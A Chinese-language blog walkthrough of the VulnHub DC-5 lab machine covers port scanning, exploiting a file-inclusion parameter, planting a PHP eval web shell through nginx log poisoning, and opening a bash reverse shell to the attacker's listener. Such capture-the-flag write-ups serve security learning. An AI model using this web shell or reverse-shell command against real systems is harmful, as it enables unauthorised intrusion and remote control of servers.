首页 > 其他分享 >vulnhub DC-5

vulnhub DC-5

时间:2024-07-24 15:29:29浏览次数:9  
标签:rpcbind log DC 192.168 nginx vulnhub tcp php

信息搜集

扫描局域网存活主机

nmap -sP 192.168.19.128/24

发现存在主机192.168.19.132,接下来探测开放端口

nmap -p- 192.168.19.132

发现存在如下三个开放端口

80/tcp    open  http
111/tcp   open  rpcbind
50742/tcp open  unknown

这里简单的了解一下什么是rpc和rpcbind.
rpc是一种使程序能够调用执行远程机器上的代码的技术.而rpcbind则是一个守护进程,类似一个电话簿一样,提供RPC程序号和网络地址之间的映射关系.

渗透

我们访问80端口,发现给出的页面中是五页英文,完全看不懂.
第五页给了一个输入接口.
image

用whatweb扫一下看看,除了服务器是nginx以外没有什么有用的信息.
提交表单到了如下界面
image

也就是说我们表单提交的内容是以get方式明文传输的.然后点一下刷新会发现如下变化
image

copyright2017变成了copyright2020.有些不明所以.
我们在用dirsearch扫描一下,发现了如下路径
image

其中的footer.php还没见过,尝试访问.
image

然后刷新会发现这个Copyright的年份会随之变化.因此我们猜测thankyou.php中的这个图标实际上值文件包含了footer.php
此时我们再做一个合理的推测,就是thankyou.php可以接受一个file参数来指定包含的文件.尝试发现成功
image

尝试打pearcmd文件包含,失败.
尝试读nginx的日志./var/log/nginx/access.log,成功

firstname=lbz&lastname=lee&country=australia&subject=aaa&file=/tmp/shell.php&cmd=ls HTTP/1.1" 200 402 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36"

发现会把我们携带的参数,以及useragent等写入日志.
向日志中写马

<?php @eval($_REQUEST['cmd']); ?>

然后使用蚁剑进行连接http://192.168.19.132/thankyou.php?file=/var/log/nginx/error.log.由于我们写马的时候会出现报错,因此需要访问error.log而不是access.log这里起初怎么也不好使,后来突然好使了,不明所以
用蚁剑链接,然后反弹shell到kali

nc -lvp 2333 #kali
bash -c 'bash -i >& /dev/tcp/192.168.19.128/2333 0>&1' #蚁剑
提权

经过测试,提权所用到的文件需要低版本的libc进行编译.有点懒得搞了,先放弃...

标签:rpcbind,log,DC,192.168,nginx,vulnhub,tcp,php
From: https://www.cnblogs.com/merak-lbz/p/18320994

相关文章

  • vulnhub DC-3
    信息搜集探测局域网内存活主机nmap-sP192.168.19.128/24得到192.168.19.130,然后扫描探测开放的端口nmap-p-192.168.19.130发现只有80端口开放,我们在浏览器中访问渗透按照上面的提示我们需要进行登录,提权等一系列操作.先用whatweb进行一下扫描whatweb-v192.16......
  • vulnhub DC-4
    信息搜集探测局域网存活主机nmap-sP192.168.19.128/24发现存在192.168.19.131,接着扫描端口nmap-p-192.168.19.131发现存在22端口提供ssh服务和80端口渗透在浏览器访问80端口发现是一个登录页面.尝试对admin用户进行弱密码爆破我们爆出了相当多的密码都能够进行登录......
  • vulnhub DC-2
    信息收集首先我们先使用nmap来扫描探测局域网内存货的靶机nmap-sP192.168.19.128/24发现局域网内存在192.168.19.129,接着扫描开放的端口nmap-p-192.168.19.129得到如下两个端口80/tcpopenhttp7744/tcpopenraqmon-pdu我们尝试访问192.168.19.129:80,发现跳......
  • AD模数转换(ADC)在音频处理中的详细深度讲解
    AD模数转换(Analog-to-DigitalConversion,简称ADC)是将模拟信号转换为数字信号的过程。对于音频处理来说,ADC是音频录制、数字音频处理和传输的关键步骤。以下是对AD模数转换在音频方面的详细讲解:1.ADC的基本原理ADC的过程包括以下几个步骤:采样(Sampling):将连续变化的模拟信号在时......
  • [BJDCTF2020]Easy MD5
    [BJDCTF2020]EasyMD5Step1看源代码没线索,用burp抓包看一下:发现提示,发现输入的是password要构造使password=’or‘1的形式使之形成永真的语句md5($pass,true)应该就是将pass的值md5加密后成十六进制转换成字符这时候276f7227就是十六进制的'or',只要MD5加密成276f7227+(......
  • 基于Memotrace(留痕)、jieba、wordcloud、cnsenti的微信聊天记录分析(一)(环境准备+词
     创作背景在数字化时代,社交媒体和即时通讯工具已成为人们日常生活中不可或缺的一部分。微信,作为中国最流行的即时通讯软件之一,不仅承载了人们的日常交流,更记录了无数情感的起伏与心灵的触碰。小明,一个对生活充满好奇与热情的年轻人,最近通过微信结识了一位特别的女生——小芳......
  • DC系列靶场---DC 2靶场的渗透测试(二)
    漏洞利用及探测rbash逃逸虽然我们现在已经可以执行切换路径命令了,但是发现还有是很多命令不能用。我想看看一下目标主机的所有用户,是不能执行的。那我们就用到了当前shell逃逸。第一种情况:/被允许的情况下;直接/bin/sh或/bin/bash第二种情况:能够设置PATH或SHELL时。e......
  • 开源邮箱套件介绍系列2:Roundcube webmail
    1.项目介绍项目网站:Roundcube–FreeandOpenSourceWebmailSoftwareRoundcube项目是一个免费的开源网络邮件解决方案,具有类似桌面的用户界面(Webmail),易于安装/配置,并且可以在标准的LAMPP服务器上运行。皮肤使用最新的网络标准来呈现一个功能强大且可定制的用户界面。Ro......
  • MySQL 学习笔记 基础(DQL,DCL,函数)
    SQL-DQL SQL-DQL-介绍DQL英文全称是DataQueryLanguage(数据查询语言),用来查询数据库中表的记录。查询关键字:SELECT SQL-DQL-语法SELECT字段列表FROM表名列表WHERE条件列表GROUPBY分组字段列表HAVING分组后条件列表ORDERBY排序字段......
  • (笔记)深入解读EtherCAT时钟DC同步的三种模式
     一、DC同步原理     用EtherCAT的分布式时钟(DC)功能使从站设备同步指的是,总线中的第一个DC从站被定义为基准时钟,EtherCAT主站将基准时钟的时间分配至所有的从站。因此,EtherCAT主站周期性发送一个ARMW命令,以此读取存储在时钟主站的ESC(EtherCAT从站控制器)上适当的寄存......